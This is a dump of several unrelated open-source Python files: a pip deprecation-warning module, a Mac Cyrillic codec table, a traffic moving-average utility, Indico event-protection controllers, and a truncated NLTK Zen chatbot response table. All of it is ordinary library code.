'''- PARAMS = ('*', 'pass');'''),
]
else:
verbose_expected_outputs += [
('''QUERY = u'SELECT COUNT(%s) AS "__count" '''
'''FROM "test_runner_person" WHERE '''
'''"test_runner_person"."first_name" = %s' '''
'''- PARAMS = (u'*', u'pass');'''),
]
| bsd-3-clause |
wbrefvem/heroku-buildpack-python | vendor/pip-pop/pip/utils/deprecation.py | 271 | 2152 | """
A module that implments tooling to enable easy warnings about deprecations.
"""
from __future__ import absolute_import
import logging
import warnings
class PipDeprecationWarning(Warning):
pass
class RemovedInPip8Warning(PipDeprecationWarning, PendingDeprecationWarning):
pass
class RemovedInPip9Warning(PipDeprecationWarning, PendingDeprecationWarning):
pass
DEPRECATIONS = [RemovedInPip8Warning, RemovedInPip9Warning]
# Warnings <-> Logging Integration
_warnings_showwarning = None
def _showwarning(message, category, filename, lineno, file=None, line=None):
if file is not None:
if _warnings_showwarning is not None:
_warnings_showwarning(
message, category, filename, lineno, file, line,
)
else:
if issubclass(category, PipDeprecationWarning):
# We use a specially named logger which will handle all of the
# deprecation messages for pip.
logger = logging.getLogger("pip.deprecations")
# This is purposely using the % formatter here instead of letting
# the logging module handle the interpolation. This is because we
# want it to appear as if someone typed this entire message out.
log_message = "DEPRECATION: %s" % message
# Things that are DeprecationWarnings will be removed in the very
# next version of pip. We want these to be more obvious so we
# use the ERROR logging level while the PendingDeprecationWarnings
# are still have at least 2 versions to go until they are removed
# so they can just be warnings.
if issubclass(category, DeprecationWarning):
logger.error(log_message)
else:
logger.warning(log_message)
else:
_warnings_showwarning(
message, category, filename, lineno, file, line,
)
def install_warning_logger():
global _warnings_showwarning
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = _showwarning
| mit |
ArneBab/pypyjs | website/demo/home/rfk/repos/pypy/lib-python/2.7/encodings/mac_cyrillic.py | 593 | 13710 | """ Python Character Mapping Codec mac_cyrillic generated from 'MAPPINGS/VENDORS/APPLE/CYRILLIC.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='mac-cyrillic',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> CONTROL CHARACTER
u'\x01' # 0x01 -> CONTROL CHARACTER
u'\x02' # 0x02 -> CONTROL CHARACTER
u'\x03' # 0x03 -> CONTROL CHARACTER
u'\x04' # 0x04 -> CONTROL CHARACTER
u'\x05' # 0x05 -> CONTROL CHARACTER
u'\x06' # 0x06 -> CONTROL CHARACTER
u'\x07' # 0x07 -> CONTROL CHARACTER
u'\x08' # 0x08 -> CONTROL CHARACTER
u'\t' # 0x09 -> CONTROL CHARACTER
u'\n' # 0x0A -> CONTROL CHARACTER
u'\x0b' # 0x0B -> CONTROL CHARACTER
u'\x0c' # 0x0C -> CONTROL CHARACTER
u'\r' # 0x0D -> CONTROL CHARACTER
u'\x0e' # 0x0E -> CONTROL CHARACTER
u'\x0f' # 0x0F -> CONTROL CHARACTER
u'\x10' # 0x10 -> CONTROL CHARACTER
u'\x11' # 0x11 -> CONTROL CHARACTER
u'\x12' # 0x12 -> CONTROL CHARACTER
u'\x13' # 0x13 -> CONTROL CHARACTER
u'\x14' # 0x14 -> CONTROL CHARACTER
u'\x15' # 0x15 -> CONTROL CHARACTER
u'\x16' # 0x16 -> CONTROL CHARACTER
u'\x17' # 0x17 -> CONTROL CHARACTER
u'\x18' # 0x18 -> CONTROL CHARACTER
u'\x19' # 0x19 -> CONTROL CHARACTER
u'\x1a' # 0x1A -> CONTROL CHARACTER
u'\x1b' # 0x1B -> CONTROL CHARACTER
u'\x1c' # 0x1C -> CONTROL CHARACTER
u'\x1d' # 0x1D -> CONTROL CHARACTER
u'\x1e' # 0x1E -> CONTROL CHARACTER
u'\x1f' # 0x1F -> CONTROL CHARACTER
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> CONTROL CHARACTER
u'\u0410' # 0x80 -> CYRILLIC CAPITAL LETTER A
u'\u0411' # 0x81 -> CYRILLIC CAPITAL LETTER BE
u'\u0412' # 0x82 -> CYRILLIC CAPITAL LETTER VE
u'\u0413' # 0x83 -> CYRILLIC CAPITAL LETTER GHE
u'\u0414' # 0x84 -> CYRILLIC CAPITAL LETTER DE
u'\u0415' # 0x85 -> CYRILLIC CAPITAL LETTER IE
u'\u0416' # 0x86 -> CYRILLIC CAPITAL LETTER ZHE
u'\u0417' # 0x87 -> CYRILLIC CAPITAL LETTER ZE
u'\u0418' # 0x88 -> CYRILLIC CAPITAL LETTER I
u'\u0419' # 0x89 -> CYRILLIC CAPITAL LETTER SHORT I
u'\u041a' # 0x8A -> CYRILLIC CAPITAL LETTER KA
u'\u041b' # 0x8B -> CYRILLIC CAPITAL LETTER EL
u'\u041c' # 0x8C -> CYRILLIC CAPITAL LETTER EM
u'\u041d' # 0x8D -> CYRILLIC CAPITAL LETTER EN
u'\u041e' # 0x8E -> CYRILLIC CAPITAL LETTER O
u'\u041f' # 0x8F -> CYRILLIC CAPITAL LETTER PE
u'\u0420' # 0x90 -> CYRILLIC CAPITAL LETTER ER
u'\u0421' # 0x91 -> CYRILLIC CAPITAL LETTER ES
u'\u0422' # 0x92 -> CYRILLIC CAPITAL LETTER TE
u'\u0423' # 0x93 -> CYRILLIC CAPITAL LETTER U
u'\u0424' # 0x94 -> CYRILLIC CAPITAL LETTER EF
u'\u0425' # 0x95 -> CYRILLIC CAPITAL LETTER HA
u'\u0426' # 0x96 -> CYRILLIC CAPITAL LETTER TSE
u'\u0427' # 0x97 -> CYRILLIC CAPITAL LETTER CHE
u'\u0428' # 0x98 -> CYRILLIC CAPITAL LETTER SHA
u'\u0429' # 0x99 -> CYRILLIC CAPITAL LETTER SHCHA
u'\u042a' # 0x9A -> CYRILLIC CAPITAL LETTER HARD SIGN
u'\u042b' # 0x9B -> CYRILLIC CAPITAL LETTER YERU
u'\u042c' # 0x9C -> CYRILLIC CAPITAL LETTER SOFT SIGN
u'\u042d' # 0x9D -> CYRILLIC CAPITAL LETTER E
u'\u042e' # 0x9E -> CYRILLIC CAPITAL LETTER YU
u'\u042f' # 0x9F -> CYRILLIC CAPITAL LETTER YA
u'\u2020' # 0xA0 -> DAGGER
u'\xb0' # 0xA1 -> DEGREE SIGN
u'\u0490' # 0xA2 -> CYRILLIC CAPITAL LETTER GHE WITH UPTURN
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa7' # 0xA4 -> SECTION SIGN
u'\u2022' # 0xA5 -> BULLET
u'\xb6' # 0xA6 -> PILCROW SIGN
u'\u0406' # 0xA7 -> CYRILLIC CAPITAL LETTER BYELORUSSIAN-UKRAINIAN I
u'\xae' # 0xA8 -> REGISTERED SIGN
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\u2122' # 0xAA -> TRADE MARK SIGN
u'\u0402' # 0xAB -> CYRILLIC CAPITAL LETTER DJE
u'\u0452' # 0xAC -> CYRILLIC SMALL LETTER DJE
u'\u2260' # 0xAD -> NOT EQUAL TO
u'\u0403' # 0xAE -> CYRILLIC CAPITAL LETTER GJE
u'\u0453' # 0xAF -> CYRILLIC SMALL LETTER GJE
u'\u221e' # 0xB0 -> INFINITY
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\u2264' # 0xB2 -> LESS-THAN OR EQUAL TO
u'\u2265' # 0xB3 -> GREATER-THAN OR EQUAL TO
u'\u0456' # 0xB4 -> CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
u'\xb5' # 0xB5 -> MICRO SIGN
u'\u0491' # 0xB6 -> CYRILLIC SMALL LETTER GHE WITH UPTURN
u'\u0408' # 0xB7 -> CYRILLIC CAPITAL LETTER JE
u'\u0404' # 0xB8 -> CYRILLIC CAPITAL LETTER UKRAINIAN IE
u'\u0454' # 0xB9 -> CYRILLIC SMALL LETTER UKRAINIAN IE
u'\u0407' # 0xBA -> CYRILLIC CAPITAL LETTER YI
u'\u0457' # 0xBB -> CYRILLIC SMALL LETTER YI
u'\u0409' # 0xBC -> CYRILLIC CAPITAL LETTER LJE
u'\u0459' # 0xBD -> CYRILLIC SMALL LETTER LJE
u'\u040a' # 0xBE -> CYRILLIC CAPITAL LETTER NJE
u'\u045a' # 0xBF -> CYRILLIC SMALL LETTER NJE
u'\u0458' # 0xC0 -> CYRILLIC SMALL LETTER JE
u'\u0405' # 0xC1 -> CYRILLIC CAPITAL LETTER DZE
u'\xac' # 0xC2 -> NOT SIGN
u'\u221a' # 0xC3 -> SQUARE ROOT
u'\u0192' # 0xC4 -> LATIN SMALL LETTER F WITH HOOK
u'\u2248' # 0xC5 -> ALMOST EQUAL TO
u'\u2206' # 0xC6 -> INCREMENT
u'\xab' # 0xC7 -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0xC8 -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2026' # 0xC9 -> HORIZONTAL ELLIPSIS
u'\xa0' # 0xCA -> NO-BREAK SPACE
u'\u040b' # 0xCB -> CYRILLIC CAPITAL LETTER TSHE
u'\u045b' # 0xCC -> CYRILLIC SMALL LETTER TSHE
u'\u040c' # 0xCD -> CYRILLIC CAPITAL LETTER KJE
u'\u045c' # 0xCE -> CYRILLIC SMALL LETTER KJE
u'\u0455' # 0xCF -> CYRILLIC SMALL LETTER DZE
u'\u2013' # 0xD0 -> EN DASH
u'\u2014' # 0xD1 -> EM DASH
u'\u201c' # 0xD2 -> LEFT DOUBLE QUOTATION MARK
u'\u201d' # 0xD3 -> RIGHT DOUBLE QUOTATION MARK
u'\u2018' # 0xD4 -> LEFT SINGLE QUOTATION MARK
u'\u2019' # 0xD5 -> RIGHT SINGLE QUOTATION MARK
u'\xf7' # 0xD6 -> DIVISION SIGN
u'\u201e' # 0xD7 -> DOUBLE LOW-9 QUOTATION MARK
u'\u040e' # 0xD8 -> CYRILLIC CAPITAL LETTER SHORT U
u'\u045e' # 0xD9 -> CYRILLIC SMALL LETTER SHORT U
u'\u040f' # 0xDA -> CYRILLIC CAPITAL LETTER DZHE
u'\u045f' # 0xDB -> CYRILLIC SMALL LETTER DZHE
u'\u2116' # 0xDC -> NUMERO SIGN
u'\u0401' # 0xDD -> CYRILLIC CAPITAL LETTER IO
u'\u0451' # 0xDE -> CYRILLIC SMALL LETTER IO
u'\u044f' # 0xDF -> CYRILLIC SMALL LETTER YA
u'\u0430' # 0xE0 -> CYRILLIC SMALL LETTER A
u'\u0431' # 0xE1 -> CYRILLIC SMALL LETTER BE
u'\u0432' # 0xE2 -> CYRILLIC SMALL LETTER VE
u'\u0433' # 0xE3 -> CYRILLIC SMALL LETTER GHE
u'\u0434' # 0xE4 -> CYRILLIC SMALL LETTER DE
u'\u0435' # 0xE5 -> CYRILLIC SMALL LETTER IE
u'\u0436' # 0xE6 -> CYRILLIC SMALL LETTER ZHE
u'\u0437' # 0xE7 -> CYRILLIC SMALL LETTER ZE
u'\u0438' # 0xE8 -> CYRILLIC SMALL LETTER I
u'\u0439' # 0xE9 -> CYRILLIC SMALL LETTER SHORT I
u'\u043a' # 0xEA -> CYRILLIC SMALL LETTER KA
u'\u043b' # 0xEB -> CYRILLIC SMALL LETTER EL
u'\u043c' # 0xEC -> CYRILLIC SMALL LETTER EM
u'\u043d' # 0xED -> CYRILLIC SMALL LETTER EN
u'\u043e' # 0xEE -> CYRILLIC SMALL LETTER O
u'\u043f' # 0xEF -> CYRILLIC SMALL LETTER PE
u'\u0440' # 0xF0 -> CYRILLIC SMALL LETTER ER
u'\u0441' # 0xF1 -> CYRILLIC SMALL LETTER ES
u'\u0442' # 0xF2 -> CYRILLIC SMALL LETTER TE
u'\u0443' # 0xF3 -> CYRILLIC SMALL LETTER U
u'\u0444' # 0xF4 -> CYRILLIC SMALL LETTER EF
u'\u0445' # 0xF5 -> CYRILLIC SMALL LETTER HA
u'\u0446' # 0xF6 -> CYRILLIC SMALL LETTER TSE
u'\u0447' # 0xF7 -> CYRILLIC SMALL LETTER CHE
u'\u0448' # 0xF8 -> CYRILLIC SMALL LETTER SHA
u'\u0449' # 0xF9 -> CYRILLIC SMALL LETTER SHCHA
u'\u044a' # 0xFA -> CYRILLIC SMALL LETTER HARD SIGN
u'\u044b' # 0xFB -> CYRILLIC SMALL LETTER YERU
u'\u044c' # 0xFC -> CYRILLIC SMALL LETTER SOFT SIGN
u'\u044d' # 0xFD -> CYRILLIC SMALL LETTER E
u'\u044e' # 0xFE -> CYRILLIC SMALL LETTER YU
u'\u20ac' # 0xFF -> EURO SIGN
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
| mit |
andrejb/bitmask_client | src/leap/bitmask/util/averages.py | 8 | 2472 | # -*- coding: utf-8 -*-
# averages.py
# Copyright (C) 2013 LEAP
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Utility class for moving averages.
It is used in the status panel widget for displaying up and down
download rates.
"""
from leap.bitmask.util import first
class RateMovingAverage(object):
"""
Moving window average for calculating
upload and download rates.
"""
SAMPLE_SIZE = 5
def __init__(self):
"""
Initializes an empty array of fixed size
"""
self.reset()
def reset(self):
self._data = [None for i in xrange(self.SAMPLE_SIZE)]
def append(self, x):
"""
Appends a new data point to the collection.
:param x: A tuple containing timestamp and traffic points
in the form (timestamp, traffic)
:type x: tuple
"""
self._data.pop(0)
self._data.append(x)
def get(self):
"""
Gets the collection.
"""
return self._data
def get_average(self):
"""
Gets the moving average.
"""
data = filter(None, self.get())
traff = [traffic for (ts, traffic) in data]
times = [ts for (ts, traffic) in data]
try:
deltatraffic = traff[-1] - first(traff)
deltat = (times[-1] - first(times)).seconds
except IndexError:
deltatraffic = 0
deltat = 0
try:
rate = float(deltatraffic) / float(deltat) / 1024
except ZeroDivisionError:
rate = 0
# In some cases we get negative rates
if rate < 0:
rate = 0
return rate
def get_total(self):
"""
Gets the total accumulated throughput.
"""
try:
return self._data[-1][1] / 1024
except TypeError:
return 0
| gpl-3.0 |
eliasdesousa/indico | indico/modules/events/management/controllers/protection.py | 2 | 5129 | # This file is part of Indico.
# Copyright (C) 2002 - 2017 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from flask import flash, redirect, request
from werkzeug.exceptions import NotFound
from indico.core.db.sqlalchemy.protection import ProtectionMode, render_acl
from indico.modules.events.management.controllers.base import RHManageEventBase
from indico.modules.events.management.forms import EventProtectionForm
from indico.modules.events.management.views import WPEventProtection
from indico.modules.events.operations import update_event_protection
from indico.modules.events.sessions import COORDINATOR_PRIV_SETTINGS, session_settings
from indico.modules.events.sessions.operations import update_session_coordinator_privs
from indico.modules.events.util import get_object_from_args, update_object_principals
from indico.util.i18n import _
from indico.web.flask.util import url_for
from indico.web.forms.base import FormDefaults
from indico.web.util import jsonify_template
class RHShowNonInheriting(RHManageEventBase):
"""Show a list of non-inheriting child objects"""
def _process_args(self):
RHManageEventBase._process_args(self)
self.obj = get_object_from_args()[2]
if self.obj is None:
raise NotFound
def _process(self):
objects = self.obj.get_non_inheriting_objects()
return jsonify_template('events/management/non_inheriting_objects.html', objects=objects)
class RHEventACL(RHManageEventBase):
"""Display the inherited ACL of the event"""
def _process(self):
return render_acl(self.event)
class RHEventACLMessage(RHManageEventBase):
"""Render the inheriting ACL message"""
def _process(self):
mode = ProtectionMode[request.args['mode']]
return jsonify_template('forms/protection_field_acl_message.html', object=self.event, mode=mode,
endpoint='event_management.acl')
class RHEventProtection(RHManageEventBase):
"""Show event protection"""
NOT_SANITIZED_FIELDS = {'access_key'}
def _process(self):
form = EventProtectionForm(obj=FormDefaults(**self._get_defaults()), event=self.event)
if form.validate_on_submit():
update_event_protection(self.event, {'protection_mode': form.protection_mode.data,
'own_no_access_contact': form.own_no_access_contact.data,
'access_key': form.access_key.data,
'visibility': form.visibility.data})
update_object_principals(self.event, form.acl.data, read_access=True)
update_object_principals(self.event, form.managers.data, full_access=True)
update_object_principals(self.event, form.submitters.data, role='submit')
self._update_session_coordinator_privs(form)
flash(_('Protection settings have been updated'), 'success')
return redirect(url_for('.protection', self.event))
return WPEventProtection.render_template('event_protection.html', self.event, 'protection', form=form)
def _get_defaults(self):
acl = {p.principal for p in self.event.acl_entries if p.read_access}
submitters = {p.principal for p in self.event.acl_entries if p.has_management_role('submit', explicit=True)}
managers = {p.principal for p in self.event.acl_entries if p.full_access}
registration_managers = {p.principal for p in self.event.acl_entries
if p.has_management_role('registration', explicit=True)}
event_session_settings = session_settings.get_all(self.event)
coordinator_privs = {name: event_session_settings[val] for name, val in COORDINATOR_PRIV_SETTINGS.iteritems()
if event_session_settings.get(val)}
return dict({'protection_mode': self.event.protection_mode, 'acl': acl, 'managers': managers,
'registration_managers': registration_managers, 'submitters': submitters,
'access_key': self.event.access_key, 'visibility': self.event.visibility,
'own_no_access_contact': self.event.own_no_access_contact}, **coordinator_privs)
def _update_session_coordinator_privs(self, form):
data = {field: getattr(form, field).data for field in form.priv_fields}
update_session_coordinator_privs(self.event, data)
| gpl-3.0 |
xiaozhuchacha/OpenBottle | grammar_induction/earley_parser/nltk/chat/zen.py | 7 | 9999 | # Natural Language Toolkit: Zen Chatbot
#
# Copyright (C) 2001-2017 NLTK Project
# Author: Amy Holland <amyrh@csse.unimelb.edu.au>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
Zen Chatbot talks in gems of Zen wisdom.
This is a sample conversation with Zen Chatbot:
ZC: Welcome, my child.
me: Good afternoon.
ZC: Ask the question you have come to ask.
me: How can I achieve enlightenment?
ZC: How do you suppose?
me: Through meditation.
ZC: Form is emptiness, and emptiness form.
me: How can I empty my mind of worldly troubles?
ZC: Will an answer to that really help in your search for enlightenment?
me: Yes.
ZC: It is better to be right than to be certain.
me: I seek truth and wisdom.
ZC: The search for truth is a long journey.
me: Are you sure?
ZC: Maybe sure, maybe not sure.
The chatbot structure is based on that of chat.eliza. Thus, it uses
a translation table to convert from question to response
i.e. "I am" --> "you are"
Of course, since Zen Chatbot does not understand the meaning of any words,
responses are very limited. Zen Chatbot will usually answer very vaguely, or
respond to a question by asking a different question, in much the same way
as Eliza.
"""
from __future__ import print_function
from nltk.chat.util import Chat, reflections
# responses are matched top to bottom, so non-specific matches occur later
# for each match, a list of possible responses is provided
responses = (
# Zen Chatbot opens with the line "Welcome, my child." The usual
# response will be a greeting problem: 'good' matches "good morning",
# "good day" etc, but also "good grief!" and other sentences starting
# with the word 'good' that may not be a greeting
(r'(hello(.*))|(good [a-zA-Z]+)',
( "The path to enlightenment is often difficult to see.",
"Greetings. I sense your mind is troubled. Tell me of your troubles.",
"Ask the question you have come to ask.",
"Hello. Do you seek englightenment?")),
# "I need" and "I want" can be followed by a thing (eg 'help')
# or an action (eg 'to see you')
#
# This is a problem with this style of response -
# person: "I need you"
# chatbot: "me can be achieved by hard work and dedication of the mind"
# i.e. 'you' is not really a thing that can be mapped this way, so this
# interpretation only makes sense for some inputs
#
(r'i need (.*)',
( "%1 can be achieved by hard work and dedication of the mind.",
"%1 is not a need, but a desire of the mind. Clear your mind of such concerns.",
"Focus your mind on%1, and you will find what you need.")),
(r'i want (.*)',
( "Desires of the heart will distract you from the path to enlightenment.",
"Will%1 help you attain enlightenment?",
"Is%1 a desire of the mind, or of the heart?")),
# why questions are separated into three types:
# "why..I" e.g. "why am I here?" "Why do I like cake?"
# "why..you" e.g. "why are you here?" "Why won't you tell me?"
# "why..." e.g. "Why is the sky blue?"
# problems:
# person: "Why can't you tell me?"
# chatbot: "Are you sure I tell you?"
# - this style works for positives (e.g. "why do you like cake?")
# but does not work for negatives (e.g. "why don't you like cake?")
(r'why (.*) i (.*)\?',
( "You%1%2?",
"Perhaps you only think you%1%2")),
(r'why (.*) you(.*)\?',
( "Why%1 you%2?",
"%2 I%1",
"Are you sure I%2?")),
(r'why (.*)\?',
( "I cannot tell you why%1.",
"Why do you think %1?" )),
# e.g. "are you listening?", "are you a duck"
(r'are you (.*)\?',
( "Maybe%1, maybe not%1.",
"Whether I am%1 or not is God's business.")),
# e.g. "am I a duck?", "am I going to die?"
(r'am i (.*)\?',
( "Perhaps%1, perhaps not%1.",
"Whether you are%1 or not is not for me to say.")),
# what questions, e.g. "what time is it?"
# problems:
# person: "What do you want?"
# chatbot: "Seek truth, not what do me want."
(r'what (.*)\?',
( "Seek truth, not what%1.",
"What%1 should not concern you.")),
# how questions, e.g. "how do you do?"
(r'how (.*)\?',
( "How do you suppose?",
"Will an answer to that really help in your search for enlightenment?",
"Ask yourself not how, but why.")),
# can questions, e.g. "can you run?", "can you come over here please?"
(r'can you (.*)\?',
( "I probably can, but I may not.",
"Maybe I can%1, and maybe I cannot.",
"I can do all, and I can do nothing.")),
# can questions, e.g. "can I have some cake?", "can I know truth?"
(r'can i (.*)\?',
( "You can%1 if you believe you can%1, and have a pure spirit.",
"Seek truth and you will know if you can%1.")),
# e.g. "It is raining" - implies the speaker is certain of a fact
(r'it is (.*)',
( "How can you be certain that%1, when you do not even know yourself?",
"Whether it is%1 or not does not change the way the world is.")),
# e.g. "is there a doctor in the house?"
(r'is there (.*)\?',
( "There is%1 if you believe there is.",
"It is possible that there is%1.")),
# e.g. "is it possible?", "is this true?"
(r'is(.*)\?',
( "%1 is not relevant.",
"Does this matter?")),
# non-specific question
(r'(.*)\?',
( "Do you think %1?",
"You seek the truth. Does the truth seek you?",
"If you intentionally pursue the answers to your questions, the answers become hard to see.",
"The answer to your question cannot be told. It must be experienced.")),
# expression of hate of form "I hate you" or "Kelly hates cheese"
(r'(.*) (hate[s]?)|(dislike[s]?)|(don\'t like)(.*)',
( "Perhaps it is not about hating %2, but about hate from within.",
"Weeds only grow when we dislike them",
"Hate is a very strong emotion.")),
# statement containing the word 'truth'
(r'(.*) truth(.*)',
( "Seek truth, and truth will seek you.",
"Remember, it is not the spoon which bends - only yourself.",
"The search for truth is a long journey.")),
# desire to do an action
# e.g. "I want to go shopping"
(r'i want to (.*)',
( "You may %1 if your heart truly desires to.",
"You may have to %1.")),
# desire for an object
# e.g. "I want a pony"
(r'i want (.*)',
( "Does your heart truly desire %1?",
"Is this a desire of the heart, or of the mind?")),
# e.g. "I can't wait" or "I can't do this"
(r'i can\'t (.*)',
( "What we can and can't do is a limitation of the mind.",
"There are limitations of the body, and limitations of the mind.",
"Have you tried to%1 with a clear mind?")),
# "I think.." indicates uncertainty. e.g. "I think so."
# problem: exceptions...
# e.g. "I think, therefore I am"
(r'i think (.*)',
( "Uncertainty in an uncertain world.",
"Indeed, how can we be certain of anything in such uncertain times.",
"Are you not, in fact, certain that%1?")),
# "I feel...emotions/sick/light-headed..."
(r'i feel (.*)',
( "Your body and your emotions are both symptoms of your mind."
"What do you believe is the root of such feelings?",
"Feeling%1 can be a sign of your state-of-mind.")),
# exclaimation mark indicating emotion
# e.g. "Wow!" or "No!"
(r'(.*)!',
( "I sense that you are feeling emotional today.",
"You need to calm your emotions.")),
# because [statement]
# e.g. "because I said so"
(r'because (.*)',
( "Does knowning the reasons behind things help you to understand"
" the things themselves?",
"If%1, what else must be true?")),
# yes or no - raise an issue of certainty/correctness
(r'(yes)|(no)',
( "Is there certainty in an uncertain world?",
"It is better to be right than to be certain.")),
# sentence containing word 'love'
(r'(.*)love(.*)',
( "Think of the trees: they let the birds perch and fly with no intention to call them when they come, and no longing for their return when they fly away. Let your heart be like the trees.",
"Free love!")),
# sentence containing word 'understand' - r
(r'(.*)understand(.*)',
( "If you understand, things are just as they are;"
" if you do not understand, things are just as they are.",
"Imagination is more important than knowledge.")),
# 'I', 'me', 'my' - person is talking about themself.
